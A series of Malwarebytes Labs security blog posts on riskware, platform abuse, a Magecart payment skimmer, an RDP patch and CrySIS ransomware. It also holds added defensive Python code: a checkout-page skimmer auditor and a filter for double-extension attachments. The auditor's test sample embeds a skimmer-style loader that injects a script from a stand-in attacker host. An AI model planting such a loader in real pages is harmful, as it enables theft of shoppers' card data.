Knowing when it’s worth the risk: riskware explained

If there’s one thing I like more than trivia quizzes, it’s quotes. Positive, inspirational, and motivational quotes. Quotes that impart a degree of ancient wisdom, or those that make you stop and consider. Reading them melts our fears, sorrows, and feelings of inadequacy away.

Some of the most inspiring quotes urge us to take risks in order to find meaning. If you don’t take risks, they say, you won’t be able to achieve remarkable things. The biggest risk, they say, is not taking a risk at all.

But when it comes to computer security, all that goes out the window. Taking risks on software you download onto your devices is not a recipe for success. Even if the programs are inherently benign, some may have features that can be used against you by those with malicious intent. No good can come of that.

What are these risky programs you’re talking about?

Did I lose you at “quotes?” That’s alright. Software programs that contain features that can easily be abused are known as riskware. They may come pre-installed on your computing device, or they may be downloaded and installed by malware.

How can something legit be a risk?

Such software was designed to have powerful features so it can do what it was programmed to do. Unfortunately, those same features can be used and/or abused by threat actors as part of a wider attack or campaign against a target. Riskware contains loopholes or vulnerabilities that can be exploited by cybercriminals and the threats they develop.

For example, there are monitoring apps available in the market that private individuals, schools, and businesses use to look after their loved ones, watch what their students are doing, or check employee activities. Those with ill intent could take over these apps to stalk certain individuals or capture sensitive information via logging keystrokes.

Read: When spyware goes mainstream

Riskware can be on mobile devices, too. On Android, there are apps created with an auto-install feature that have system-level rights and come pre-installed on devices; therefore, they cannot be removed (but can be disabled). The auto-installer we detect as Android/PUP.Riskware.Autoins.Fota, however, cannot be manually deactivated. Once exploited, it can be used to secretly auto-install malware onto susceptible devices.

Note that if you install software that your anti-malware program detects as riskware, then you need only make sure your security program is updated to stay safe.

How can you tell which software is riskware?

There are varying levels of malicious intent and capabilities for all software. In fact, any program should be assumed to have potential flaws and vulnerabilities that can be exploited. However, there are criteria for determining what is considered malware vs. riskware, and which software is deemed “safe.”

Pieter Arntz, malware intelligence researcher and riskware expert, made this clear when he said that riskware can be classified based on the risks to data and devices involved.

“In my opinion, there are a few major categories of riskware, and you can split them up by type of risk they introduce,” Arntz said. “Some bring risk to the system because they introduce extra vulnerabilities, such as unlicensed Windows with updates disabled. Some bring risk to the user because having them is forbidden by law in some countries, such as hacking tools.”

Arntz continues: “Some monitor user behavior. When this is by design, a software may be labelled as riskware rather than spyware. Some bring risk to the system because they are usually accompanied by real malware, and their presence can be indicative of an infection. [And] some bring risk to the user because their use is against the Terms of Service of other software on the system, such as cracks.”

What’s the difference between riskware and PUPs?

Riskware and potentially unwanted programs (PUPs) are similar in that their mere presence could open systems up to exploitation. So, it’s no surprise that users might liken one to the other. However, there are different criteria for classifying riskware and PUPs.

Programs might be termed riskware because they put the user at risk in some way by:

  • Violating the terms of service (ToS) of other software or a user platform on the device.
  • Blocking another application or software from being updated and patched.
  • Being illegal in the user’s country.
  • Potentially being used as a backdoor for other malware.
  • Being indicative of the presence of other malware.

Whereas programs might be considered PUPs because:

  • They may have been installed without the user’s consent.
  • They may be supported by aggressive advertisements.
  • They may be bundlers or part of a bundle.
  • They may be misleading or offer a false sense of security.

Regardless of whether a program is a PUP or riskware, it’s important to evaluate critically whether or not the software is as useful and relevant as it is a nuisance or a potential risk.

Should I keep quarantined riskware or remove it?

If your anti-malware program detects and quarantines riskware, you likely have a choice whether or not to keep it. Our advice is to make a decision based on whether or not you installed the riskware yourself and then, if you did, weighing the benefits of the app against the risks outlined in the detection.

If riskware was installed without the user’s knowledge, it’s possible the software is part of an attack ensemble delivered by malware. I’d be more worried about the presence of malware in this case, and would delete the offending riskware.

If you want your anti-malware to stop detecting software you use that is classified as riskware, see if you can configure your security solution to exclude the file or whitelist it. That way, the software won’t be detected in the future. Want to know how to do this with your Malwarebytes product? Go here.

Stay safe out there!

The post Knowing when it’s worth the risk: riskware explained appeared first on Malwarebytes Labs.

Governments increasingly eye social media meltdown

These are trying times for social networks, with endless reports of harassment and abuse not being tackled and many users leaving platforms forever. The major sites such as Facebook and Twitter do what they can, but sheer userbase volume and erroneous automated feedback leave people cold. Bugs such as potentially sharing location data when users enable it alongside other accounts on the same phone are something we’ve come to expect.

Just recently, Twitter and Instagram started trying to filter out what they consider to be erroneous information about vaccines, displaying links to medical information sites amongst search results.

Elsewhere, major portals are trying to establish frameworks for hate speech, or fight the rising tide of trolls and fake news. One of Facebook’s co-founders recently had some harsh words for Zuckerberg, claiming the recent catalogue of issues make a good case for essentially breaking the site up. It’s not that long ago since the so-called Cambridge Analytica scandal came to light, which continues to reverberate about security and privacy circles.

It was always burning

Wherever you look, there’s a whole lot of fire fighting going on and no real solutions on the horizon. In many ways, the sites are too big to fail, and the various alternatives that spring up never quite seem to catch on. Mastodon made a huge splash at launch and seems to have a lot more success at tackling abuse than the big guns, but by the same token, lots of people tried it for a month and never went back. Smaller, decentralised instances with dedicated admins/moderators went a long way toward keeping things usable, but ultimately it seems it was just too niche for people more versed in the familiar sights and sounds of Twitter.

Dogpiling from other regions focused on destabilizing the very platforms being used at any given time only adds fuel to the fire.

To summarise, not the greatest of times being had by social media portals. Bugs will come and go, and sneaky individuals will always try to game systems with spam or political propaganda. Most people would (probably?) agree that abuse is where the bulk of the issues and concerns lie. There’s nothing more frustrating than seeing people hounded on a service they make use of with no tools available to fight it.

The fightback begins

Here are some of the ways sites are looking to tackle the abuse challenge before them.

1) Twitter has sanitised the way accounts interact for some time. The quality filters make it more difficult to witness drive-by abuse postings sent your way via a few changes of the settings. Assuming you don’t follow people sending you nonsense, then you’ll miss most of the barrage.

No confirmed email address? No confirmed phone number? Sporting a default profile avatar? Brand new accounts? All of these points and more will help keep the bad tweets at bay. Muting is also a lot more reliable than it used to be. A good opening salvo, but still more can be done.

Using this as a starting point, Twitter is now finding ways to combine these outliers of registration with actual user behaviour and the networks in which they operate to weed out bad elements. For example,

“We’re also looking at how accounts are connected to those that violate our rules and how they interact with each other,” Twitter executives wrote in the post. “These signals will now be considered in how we organize and present content in communal areas like conversation and search.”

This would suggest that even if, say, your account ticks enough boxes to avoid the quality filter, you may not escape the algorithm hiding your tweets if it feels you spend a fair portion of time interacting with abusers. Those abusive accounts may also be discreetly hidden from view when browsing popular hashtags in an effort to prevent them from gaming the system.

It seems Twitter needs to balance out hiding abusive messages and clever, sustained trolling versus simply removing content from plain view that one may disagree with but isn’t actually abusive. This will be quite a challenge.

2) Political shenanigans cover the full range of social media sites, coming to prominence in the 2016 US election and beyond. Once large platforms began digging into their data in this realm, they found a non-stop stream of social engineering and manipulation alongside flat out lies. 100,000 political images were shared on open WhatsApp groups in the run-up to the 2018 Brazilian elections, and more than half contained mistruths or lies.

Facebook is commissioning studies into human rights impacts on places like Myanmar due to how the platform is used there. Last year, Oxford University found evidence of high-level political manipulation on social media in 48 countries.

These are serious problems. How are they being addressed long term?

Fix it…or else?

In a word, slowly.

Lawmaker pressure has resulted in some changes at the top. People and organisations wanting to place political ads on Facebook or Google must now supply the identity behind the ad in some regions. This is to combat the dubious tactic known as “dark advertising,” where only the intended target of an ad can see it—usually with zero indication as to who made it in the first place. WhatsApp is cutting down on message forwarding to try and prevent the spread of political misinformation.

Right now, the biggest players are gearing up for the European Parliament Elections—again, with the possible threat of action hanging over them should they fail to do an acceptable job. If they don’t remove bogus accounts quickly enough, if they fail to be rigorous and timely with fact checking and bad article deletion, then regulators could turn up the pressure on the Internet giants.

Canning the spam with a banhammer

It’s not all doom and slow-moving gloom, though. It’s now more common to see platforms making regular public-facing statements about how the war on fakery is going.

Facebook recently made an announcement that they’ve had to remove:

265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in coordinated inauthentic behavior. This activity originated in Israel and focused on Nigeria, Senegal, Togo, Angola, Niger and Tunisia along with some activity in Latin America and Southeast Asia. The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians.

That’s a significant amount of time sunk into one coordinated campaign. Of course, there are many others and Facebook can only do so much at a time; all the same, this is encouraging. While it may be a case of too little, too late for social media platforms as a whole to start cracking down on abusive patterns now accepted as norms, they’re finally doing something to tackle the rot. All the while, governments are paying close attention.

UKGov steps up to the plate

The Jo Cox Foundation will work alongside politicians of all parties to tackle aspects of abuse online, which can lead to catastrophic circumstances. Their paper [PDF format] is released today, and has a particularly lengthy section on social media.

It primarily looks at how people desiring to work in public office are being hammered on all sides by online abuse, and how it then filters down into various online communities. It weighs up the realities of current UK lawmaking…

The posting of death threats, threats of violence, and incitement of racial hatred directed towards anyone (including Parliamentary candidates) on social media is unambiguously illegal. Many other instances of intimidation, incitement to violence and abuse carried out through social media are also likely to be illegal.

…with the reality of the message volume people in public-facing roles are left with:

Some MPs receive an average of 10,000 messages per day

Where do you begin with something like that?

Fix it or else, part 2

Slap bang in the middle of multiple quoted comments from social media sites explaining how they’re tackling online abuse/trolling/political dark money campaigns, we have this:

It is clear to us that the social media companies must take more responsibility for the content posted and shared on their sites. After all, it is these companies which profit from that content. However, it is also clear that those companies cannot and should not be responsible for human pre-moderation of all of the vast amount of content uploaded to their sites.

Doesn’t sound too bad for the social media companies, right? Except they also go on to say this:

Government should bring forward legislation to shift the liability of illegal content online towards social media companies.

Make no mistake, what social media platforms want versus what they’re able to realistically achieve may be at odds with this timetable:


The battle lines, then, are set. Companies know there’s a problem, and it’s become too big to hope for some form of self-resolution. Direct, hands-on action and more investment in abuse/reporting methods, along with more employees to handle such reports, are sorely needed. At this point, if social media organisations can’t set this one to rest, then it looks as though someone else may go and do it for them. Depending on how that pans out, we may feel the after effects for some time to come.

The post Governments increasingly eye social media meltdown appeared first on Malwarebytes Labs.

Skimmer acts as payment service provider via rogue iframe

Criminals continue to target online stores to steal payment details from unaware customers at a rapid pace. There are many different ways to go about it, from hacking the shopping site itself, to compromising its supply-chain.

A number of online merchants externalize the payment process to a payment service provider (PSP) for various reasons, including peace of mind that transactions will be handled securely. Since some stores will not process payments on their own site, one might think that even if they were compromised, attackers wouldn’t be able to steal customers’ credit card data.

But this isn’t always true. RiskIQ previously detailed how Magecart’s Group 4 was using an overlay technique that would search for the active payment form on the page and replace it with one prepped for skimming.

The one we are looking at today adds a bogus iframe that asks unsuspecting customers to enter their credit card information. The irony here is that the shopping site itself wouldn’t even ask for it, since visitors are normally redirected to the external PSP.

Skimmer injects its own credit card fields

Small and large online retailers must adhere to security requirements from the Payment Card Industry Data Security Standard (PCI DSS) that go well beyond using SSL for their payment forms. Failing to do so can lead to large fines and even the cancellation of their merchant accounts.

One of the most popular e-commerce platforms, Magento, can help merchants be PCI compliant via its Magento Commerce cloud product, or via integrated payment gateways and hosted forms, so that sensitive data neither flows through nor is stored on the Magento application server itself.

During one of our web crawls, we spotted suspicious activity from a Magento site and decided to investigate further. The following image depicts two slightly different checkout pages based on the same platform, with the one on the right being the suspicious site we had identified.

On the left, the expected payment form; on the right the one with a rogue iframe.

What we notice are new fields to enter credit card data that did not exist on the left (untampered form). By itself, this may not be out of the ordinary, since online merchants do use such forms (including iframes) as part of their checkout pages.

But there are some things that just don’t add up here. For example, right below the credit card field is text that says, “Then you will be redirected to PayuCheckout website when you place an order.” Why would a merchant want to get their customers to type in their credit card again and hurt their conversion rate?

And indeed the unsuspecting shopper will then be taken to another (legitimate, this time) payment form to re-enter their credit card details. Having to type in your information twice should be an immediate red flag. This is the kind of scenario we typically see with phishing sites as well.

The legitimate (external) payment form

At this point, we know that this e-commerce site is yet another victim that fell into the hands of one of the Magecart groups. In the following section, we look at how this attack works.

A three-step exfiltration process

The Magento site has been hacked and malicious code injected into all of its pages. However, the most important one that we are going to look at is the actual checkout page.

The crooks first load their own innocuous iframe to collect the credit card data, which is then validated before being exfiltrated.

Traffic capture showing the steps involved in credit card theft

As we mentioned, injected code is present in all the PHP pages of that site, but it will only trigger if the current URL in the address bar is the shopping cart checkout page (onestepcheckout). Some extra checks (screen dimensions and presence of a web debugger) are also performed before continuing.

Injected snippet that checks for certain elements before loading the full skimmer

If the right conditions are met, an external piece of JavaScript is loaded from thatispersonal[.]com, a domain registered with REGISTRAR OF DOMAIN NAMES REG.RU LLC and hosted in Russia.

It’s worth noting that directly browsing to this URL without the correct referer (one of the hacked Magento sites) will return a decoy script instead. The complete script is largely obfuscated and creates the iframe-box we saw above for harvesting credit card details at the right place on screen.

The rogue, previously non-existent credit card fields

It also loads another long and yet again obfuscated script ([hackedsite]_iframe.js) where “hackedsite” is the name of the e-commerce site that was hacked. Its job is to process, validate, and then exfiltrate the user data.

A familiar sight, with data elements to be scraped and exfiltrated

That data is sent via a POST request to the same malicious domain in a custom encoded format.

The network request that exfiltrates the stolen data
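To make the three-step loader described above concrete from the defender's side, here is an added Python example (not code from Malwarebytes or from the skimmer itself) that audits a saved checkout page for the pattern: iframes and scripts from hosts outside the store's allowlist, card-data inputs on a page that should only redirect to the PSP, and an inline loader gated on the checkout URL that probes the screen or a debugger before injecting a script or iframe. The hosts shop.example, psp.example and evil.example and the sample markup are constructed assumptions.

```python
"""Audit a checkout page for the rogue-iframe skimmer pattern (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Field names/ids/placeholders that indicate card data is being collected.
CARD_FIELD_RE = re.compile(
    r"(cc|card)[-_ ]?(num|number)|cvv|cvc|csc|expir|exp[-_]?(month|year|date)", re.I)
CARD_AUTOCOMPLETE = {"cc-number", "cc-csc", "cc-exp", "cc-exp-month",
                     "cc-exp-year", "cc-name"}
# Loader heuristic: URL gate on the checkout path, anti-analysis probe,
# and a dynamically created script/iframe. All four must be present.
LOADER_PARTS = (
    re.compile(r"location", re.I),
    re.compile(r"checkout", re.I),
    re.compile(r"debugger|screen\.(width|height)|outer(Width|Height)"),
    re.compile(r"createElement\s*\(\s*['\"](script|iframe)['\"]"),
)


class CheckoutAuditor(HTMLParser):
    def __init__(self, page_url, allowed_hosts):
        super().__init__()
        self.page_host = urlparse(page_url).hostname.lower()
        # The store itself plus its known payment service provider(s).
        self.allowed = {h.lower() for h in allowed_hosts} | {self.page_host}
        self.findings = []
        self._script_buf = None  # non-None while inside <script>...</script>

    def _host_of(self, url):
        """Lowercase host of url; relative URLs resolve to the page host."""
        if not url:
            return None
        host = urlparse(url.strip()).hostname
        return host.lower() if host else self.page_host

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("iframe", "script"):
            host = self._host_of(a.get("src"))
            if host and host not in self.allowed:
                self.findings.append(("unlisted_" + tag, host))
            if tag == "script":
                self._script_buf = []
        elif tag == "input":
            labels = " ".join((a.get("name", ""), a.get("id", ""),
                               a.get("placeholder", "")))
            if (a.get("autocomplete", "").lower() in CARD_AUTOCOMPLETE
                    or CARD_FIELD_RE.search(labels)):
                self.findings.append(("card_field",
                                      a.get("name") or a.get("id") or "?"))

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf)
            self._script_buf = None
            if all(p.search(body) for p in LOADER_PARTS):
                self.findings.append(("loader_heuristic", "inline script"))


def audit_checkout(page_url, html, allowed_hosts):
    """Return (finding_type, detail) tuples; an empty list means nothing suspicious."""
    auditor = CheckoutAuditor(page_url, allowed_hosts)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample pages, not real store markup. The clean page only offers a
# redirect to the PSP; the tampered one carries the injected iframe, card inputs
# and gated loader. evil.example stands in for the attacker-controlled host.
CLEAN_PAGE = """<html><body>
<form id="co-payment-form" action="/checkout/onepage/savePayment">
  <input type="radio" name="payment[method]" value="psp_redirect">
  <p>You will be redirected to the payment provider when you place an order.</p>
  <script src="/static/checkout.js"></script>
</form></body></html>"""

TAMPERED_PAGE = """<html><body>
<form id="co-payment-form" action="/checkout/onepage/savePayment">
  <input type="radio" name="payment[method]" value="psp_redirect">
  <iframe src="https://evil.example/checkout/frame.html"></iframe>
  <input type="text" name="cc_number" placeholder="Credit Card Number">
  <input type="text" name="cc_cvv" autocomplete="cc-csc">
  <p>Then you will be redirected to the payment provider when you place an order.</p>
  <script>
    if (location.href.indexOf('onestepcheckout') > -1 && screen.width > 600) {
      var s = document.createElement('script');
      s.src = 'https://evil.example/loader.js';
      document.head.appendChild(s);
    }
  </script>
  <script src="/static/checkout.js"></script>
</form></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, audit_checkout("https://shop.example/onestepcheckout/",
                                   page, ["psp.example"]))
```

Run it against a page fetched with the store's own referer set, since the article notes the full script is only served to requests that look like they come from a hacked store.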

The diversity of skimmers and attacks

This particular skimmer evolved slightly over time and wasn’t always used for the rogue iframe technique. Historical scans archived on show some changes with obfuscation going from a hex encoded array to string manipulation using split and join methods.

Criminals have many different ways of stealing data from online shoppers with web skimmers. While supply-chain attacks are the most damaging because they usually affect a larger number of stores, they are also more difficult to pull off.

Compromising vulnerable e-commerce sites via automated attacks is the most common approach. Once the skimmer is injected into the payment page, it can steal any data that is entered and immediately send it to the crooks. As we have seen in this article, even e-commerce sites that do not collect payment data themselves can be affected when the attackers inject previously non-existent credit card fields into the checkout page.

For online shoppers, this trick will be difficult to spot early on and perhaps only after being prompted for the same information again will they become suspicious.

While it is important for e-commerce sites to get remediated in order to prevent further theft, we know this process can be delayed for one reason or another. This is why we focus on the exfiltration gates to protect our customers in the event that they happen to be shopping on a compromised store.

Further reading

Indicators of Compromise (IoCs)


The post Skimmer acts as payment service provider via rogue iframe appeared first on Malwarebytes Labs.

A week in security (May 13 – 19)

Last week, Malwarebytes Labs reviewed active and unique exploit kits targeting consumers and businesses alike, reported about a flaw in WhatsApp used to target a human rights lawyer, and wrote about an important Microsoft patch that aimed to prevent a “WannaCry level” attack. We also profiled the Dharma ransomware—aka CrySIS—and imparted four lessons from the DDoS attack against the US Department of Energy that disrupted major operations.

Other cybersecurity news

  • Cybersecurity agencies from Canada and Saudi Arabia issued advisories about hacking groups actively exploiting Microsoft SharePoint server vulnerabilities to gain access to private business and government networks. A different patch for the flaw, which was officially designated as CVE-2019-0604, was already available as of February this year. (Source: ZDNet)
  • Nefarious actors behind adware try hard to be legit—or at least look the part. A recent discovery of a pseudo-VPN called Pirate Chick VPN in an adware bundle was one of the ways they attempted to do this. However, the software is actually a Trojan that pushes malware, particularly the AZORult information stealer. (Source: Bleeping Computer)
  • SIM-swapping, the fraudulent act of convincing a mobile carrier to swap a target’s phone number over to a SIM card owned by the criminal, doubled in South Africa. This scam is used to divert incoming SMS-based tokens used in 2FA-enabled accounts. (Source: BusinessTech)
  • Ransomware attacks on US cities are on the uptick. So far, there have been 22 known attacks this year. (Source: ABC Action News)
  • Typosquatting is back on the radar, and it’s mimicking major online news websites to push out fake news or disinformation reports, according to a report from The Citizen Lab. Some of the sites copied were Politico, Bloomberg, and The Atlantic. The group behind this campaign is Endless Mayfly, an Iranian “disinformation supply chain.” (Source: The Citizen Lab)
  • No surprise here: Researchers from Charles III University of Madrid (Universidad Carlos III de Madrid) and Stony Brook University in the US found that Android smartphones are riddled with bloatware, which creates hidden privacy and security risks to users. (Source: Sophos’s Naked Security Blog)
  • Organizations that use the cloud to store PII were considering moving back to on-premises storage due to cloud security concerns, according to a survey. (Source: Netwrix)
  • The Office of the Australian Information Commissioner (OAIC) recently released a report about their findings on breaches in healthcare, which is still an ongoing problem. They found that such breaches were caused mainly by human error. (Source: CRN)
  • Websites of retailers are continuously facing billions of hacking attempts every year, according to an Akamai Technology report. Consumers should take this as a wake-up call to stop reusing credentials across all their online accounts. (Source: BizTech Magazine)
  • After the discovery of Meltdown and Spectre, security flaws found in Intel and AMD chips, several researchers have again uncovered another flaw that could allow attackers to eavesdrop on every piece of user data that a processor touches. Intel collectively refers to attacks against this flaw as Microarchitectural Data Sampling (MDS). (Source: Wired)

Stay safe, everyone!

The post A week in security (May 13 – 19) appeared first on Malwarebytes Labs.

4 Lessons to be learned from the DOE’s DDoS attack

Analysts, researchers, industry professionals, and pundits alike have all posited the dangers of the next-generation “smart grid,” particularly when it comes to cybersecurity. They warn that without the right measures in place, unscrupulous parties could essentially wreak havoc on the bulk of society by causing severe outages or worse.

It is a real possibility, but up until now, it’s been something that’s largely hypothetical in nature. In March, an unidentified power company reported a “cyber event” to the Department of Energy (DOE) that caused major disruptions in their operations. While the event did not cause a blackout or power shortage, it was likened to the impact of a major interruption, including events like severe storms, physical attacks, and fuel shortages.

It’s easy to dismiss this as a one-off event, especially since there was no energy disruption to the public as a result. But, in fact, the exact opposite should be inferred from this. It’s merely the first toe over the line in a world where cyberattacks are consistently growing more dangerous, highlighting the need to understand and improve security moving forward.

What lessons can be learned from this attack, and what can hopefully be done to mitigate risk in the future?

1. Disruption comes in many forms

Almost immediately, the attack could be dismissed because it didn’t cause power outages or severe disruptions, but that’s the kind of ostrich-in-the-sand approach that leads to vulnerability in the future. Disruptions or delays can come in many forms, especially for utility providers.

When an attack is identified, the appropriate response teams must dedicate resources to dealing with the oncoming wave. That is essentially costing valuable hours and money, but it’s also taking those teams away from more important tasks. A particularly nasty attack could cause crews to pause or delay certain activities simply to cooperate with an investigation. That could then result in a provider losing efficiency, capabilities, or worse.

At the very least, providers that incur significant costs would need to recuperate the money somehow, and that will most likely roll back into pricing. It’s hard to imagine a minor cyberattack having such an impact on the market, but it’s a definite possibility.

2. Many cyberattacks are easily preventable

Sophisticated cyberattacks can cause a lot of damage, but many of them can be easily prevented with the right security in place. According to an official, the DoS event reported to the DOE happened because of a known software vulnerability that required a patch to fix—a patch that had already been published. Hitting “update” would have thwarted the attack.

There’s no further information about what, specifically, was attacked. It could have been computers or workstations, or other Internet-facing devices or network tools. Attackers could have stolen data, proprietary files, or held systems up for ransom. Whatever the damage done, it could have easily been prevented.

A recent study revealed that 87 percent of all focused attacks from January to mid-March 2018 were prevented. This was achieved through a combination of measures, the first being the adoption of breakthrough technologies.

But just as important to stopping attacks is building a strong and proactive security foundation. The latter requires vigilant maintenance of the systems and devices in question, which includes updating the tech and applying security patches for known exploits.

3. DDoS attacks should be taken seriously

Today’s DoS and DDoS attacks are different: they are more vicious, pointed, and capable. Originally, launching a DDoS attack meant sending a huge bulk of requests to an IP address that overloaded the related systems and locked out legitimate requests. Generally, while these attacks do come from a few different computers and sources, they use less complex request methods.

The problem with the current landscape is not just that the attacks have become more sophisticated themselves, but that there are so many more potential channels. The Mirai botnet, for example, took advantage of IoT devices such as security cameras, smart home tech, and more. In turn, this makes the scale and capability of the attack much stronger because there are so many more devices involved, and there’s so much more data flowing into the targeted systems.

A massive distributed-denial-of-service attack can take down company websites, entire networks or, in the case of Mirai, nearly the entire Internet. For utility providers, this kind of attack could prove disastrous to operations, inundating network servers and equipment with requests and blocking out official communications.

DDoS attacks should be taken more seriously, and today’s enterprise world should be focused on preventing and protecting from them as much as any other threat. Most cloud service providers already do a great job protecting against these attacks. It becomes a real issue when hackers can take advantage of existing vulnerabilities, just as they did with the DOE event.

4. They aren’t time-limited

In the TechCrunch report about the incident, it’s revealed that the attack caused “interruptions of electrical system operation” for a period of over 10 hours. Ten hours is a decent amount of time, and it provides a glimpse at just how prolonged these threats can be. Network layer attacks can last longer than 48 hours, while application layer attacks can go on for days. Infiltration of systems and networks for spying—weeks and months.

It adds another layer to the problem, beyond general security. These attacks can last for increasingly long periods of time, and when it comes to utility providers and the smart grid, that could potentially mean lengthy service disruptions.

Imagine being without power or water for over 60 days because of a sophisticated DDoS attack? While not likely, such a scenario highlights the need to find backup solutions to the problem.

What, for instance, are these providers doing to ensure services are properly backed up and supported during large-scale cyberevents?

Cybersecurity should be a priority

The key takeaway here is that cybersecurity, in general, should be one of the highest priorities for all entities operating in today’s landscape, utility providers included. These attacks have grown to be sophisticated, targeted, capable, and more rampant.

The argument to be made isn’t necessarily that protecting from any one form of attack should be more important than others. It’s that all threats should be taken seriously, including DDoS attacks, which are growing more common. To make matters worse, there’s a much larger pool of channels and devices with which attacks can originate, and they can be carried out over long periods of time.

This increased risk poses some additional questions. Is the smart grid truly ready for primetime? Can it hope to compete against such threats? If cybersecurity is baked into its design, it has a fighting chance.

The post 4 Lessons to be learned from the DOE’s DDoS attack appeared first on Malwarebytes Labs.

Microsoft pushes patch to prevent ‘WannaCry’ level vulnerability

This month marks the two-year anniversary since the infamous WannaCry attack. As an anniversary present to the world, Microsoft has pushed out patches to secure a newly-identified Remote Desktop Protocol (RDP) vulnerability found in certain Windows operating systems.

The potential damage of the newly-discovered RDP vulnerability matches the dangers we experienced with the WannaCry ransomware, malware that used weaponized vulnerabilities to infect systems across the globe, essentially acting as a worm. This RDP vulnerability likewise allows attackers to execute code on the targeted system without needing to infect the system first.

So, worst-case-scenario? A WannaCry wannabe will quickly spread malware across the world, exploiting vulnerable systems and sending everyone into a panic.

How to patch the vulnerability

So how do you fix this? Luckily, Microsoft has released patches for the vulnerable operating systems, which include most operating systems released before Windows 8:

Anyone who is running Windows 8, 10, or any of the modern Windows Server operating systems is not vulnerable to this threat.

If you have one of the aforementioned operating systems currently running and connected to the Internet, you’ll need to update as soon as possible. Not all of these operating systems are out of Microsoft support, and those who have automatic updates enabled should be fine and patched already.

However, if you are unable to enable automatic updates, or you are still running Windows XP and/or Windows Server 2003, you’ll need to download the patch and manually execute it.

For those of you who need to update manually, just click on the operating system you are working with and you’ll be navigated to the Microsoft patch download page, which has the patches you need to download.

Security researcher Kevin Beaumont identified millions of vulnerable systems on

Learning from history

RDP has historically been an avenue for attackers attempting to break into systems and/or drop malware, but we’ve noticed an uptick in RDP attacks against businesses over the last year. With that in mind, even after patching, you should consider checking out our guide on how to protect RDP from ransomware attacks.

The incident with WannaCry in 2017 has forever changed the perception of how to launch an effective attack against a large portion of the world. We’ve observed exploits used by this threat in modern commercial malware, such as Emotet and TrickBot.

It would not be out of the realm of possibility that within the next few weeks, this vulnerability will be weaponized and used against consumers and businesses who fail to patch and protect their networks. Don’t be a statistic. Protect your machines, data, networks, and users right now.

The post Microsoft pushes patch to prevent ‘WannaCry’ level vulnerability appeared first on Malwarebytes Labs.

Threat spotlight: CrySIS, aka Dharma ransomware, causing a crisis for businesses

CrySIS, aka Dharma, is a family of ransomware that has been evolving since 2006. We have noticed that this ransomware has become increasingly active lately, increasing by a margin of 148 percent from February until April 2019. The uptick in detections may be due to CrySIS’ effective use of multiple attack vectors.

[Image: graph of the number of CrySIS detections]

Profile of the CrySIS ransomware

CrySIS/Dharma, which Malwarebytes detects as Ransom.Crysis, targets Windows systems and primarily goes after businesses. It uses several methods of distribution:

  • CrySIS is distributed as malicious attachments in spam emails. Specific to this family is the use of malicious attachments that use double file extensions, which under default Windows settings may appear to be non-executable, when in reality they are.
  • CrySIS can also arrive disguised as installation files for legitimate software, including AV vendors. CrySIS operators will offer up these harmless looking installers for various legitimate applications as downloadable executables, which they have been distributing through various online locations and shared networks.
  • Most of the time, CrySIS/Dharma is delivered manually in targeted attacks by exploiting leaked or weak RDP credentials. This means a human attacker is accessing the victim machines prior to the infection by brute-forcing the Windows RDP protocol on port 3389.
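The double-extension trick in the first bullet works because Windows, with its default "hide extensions for known file types" setting, drops the final extension in Explorer, so a file named invoice.pdf.exe is shown as invoice.pdf. The following Python is an added example, not code from the Malwarebytes post, showing the check a mail gateway or attachment filter could apply: it reconstructs the name a user would see and flags attachments whose real final extension is executable while an earlier extension looks like a document. The two extension sets are assumptions for the example and should be replaced by your own gateway policy.

```python
# Added example (not from the Malwarebytes post): flag attachments that use the
# double-extension trick. Extension sets are assumptions for this example;
# replace them with your own gateway policy.

# Final extensions Windows will run directly (assumed, non-exhaustive).
EXECUTABLE_EXTS = {
    "exe", "scr", "com", "pif", "bat", "cmd", "msi", "hta",
    "js", "jse", "vbs", "vbe", "wsf", "ps1",
}

# Extensions a recipient expects on a harmless document or image (assumed).
DECOY_EXTS = {
    "pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "rtf", "txt",
    "jpg", "jpeg", "png", "gif", "zip",
}


def displayed_name(filename: str) -> str:
    """Approximate what Explorer shows with the default
    'Hide extensions for known file types' setting: the final extension is
    dropped, so 'invoice.pdf.exe' is displayed as 'invoice.pdf'.
    (Simplification: Explorer only hides registered types; an unknown
    final extension would stay visible.)"""
    base, dot, _ext = filename.rpartition(".")
    if not dot or not base:          # no extension at all, or a dotfile
        return filename
    return base


def extensions(filename: str) -> list:
    """All extensions of a name, lower-cased: 'a.PDF.exe' -> ['pdf', 'exe']."""
    parts = filename.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def classify_attachment(filename: str) -> dict:
    """Return a verdict for one attachment name.

    block  - executable final extension hidden behind a document-like one
    review - executable final extension on its own
    allow  - everything else
    """
    exts = extensions(filename)
    final = exts[-1] if exts else ""
    is_executable = final in EXECUTABLE_EXTS
    has_decoy = any(e in DECOY_EXTS for e in exts[:-1])
    if is_executable and has_decoy:
        verdict = "block"
    elif is_executable:
        verdict = "review"
    else:
        verdict = "allow"
    return {
        "filename": filename,
        "shown_as": displayed_name(filename),
        "final_ext": final,
        "verdict": verdict,
    }


def blocked_attachments(filenames) -> list:
    """Names from an email's attachment list that should be blocked."""
    return [n for n in filenames if classify_attachment(n)["verdict"] == "block"]


if __name__ == "__main__":
    # Constructed sample attachment names.
    sample = ["invoice.pdf.exe", "report.docx", "photo.JPG.scr",
              "setup.exe", "archive.tar.gz"]
    for name in sample:
        r = classify_attachment(name)
        print(f"{name:20} shown as {r['shown_as']:15} -> {r['verdict']}")
```

The "review" verdict exists because a bare executable attachment is policy-dependent, whereas an executable hiding behind a document extension has no legitimate use and can be blocked outright.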

In a recent attack, CrySIS was delivered as a download link in a spam email. The link pointed to a password-protected, self-extracting bundle installer. The password was given to the potential victims in the email and, besides the CrySIS/Dharma executable, the installer contained an outdated removal tool issued by a well-known security vendor.

This social engineering strategy worked to bring down user defenses. Seeing a familiar security solution in the installation package tricked users into believing the downloadable was safe, and the attack was successful.

The infection

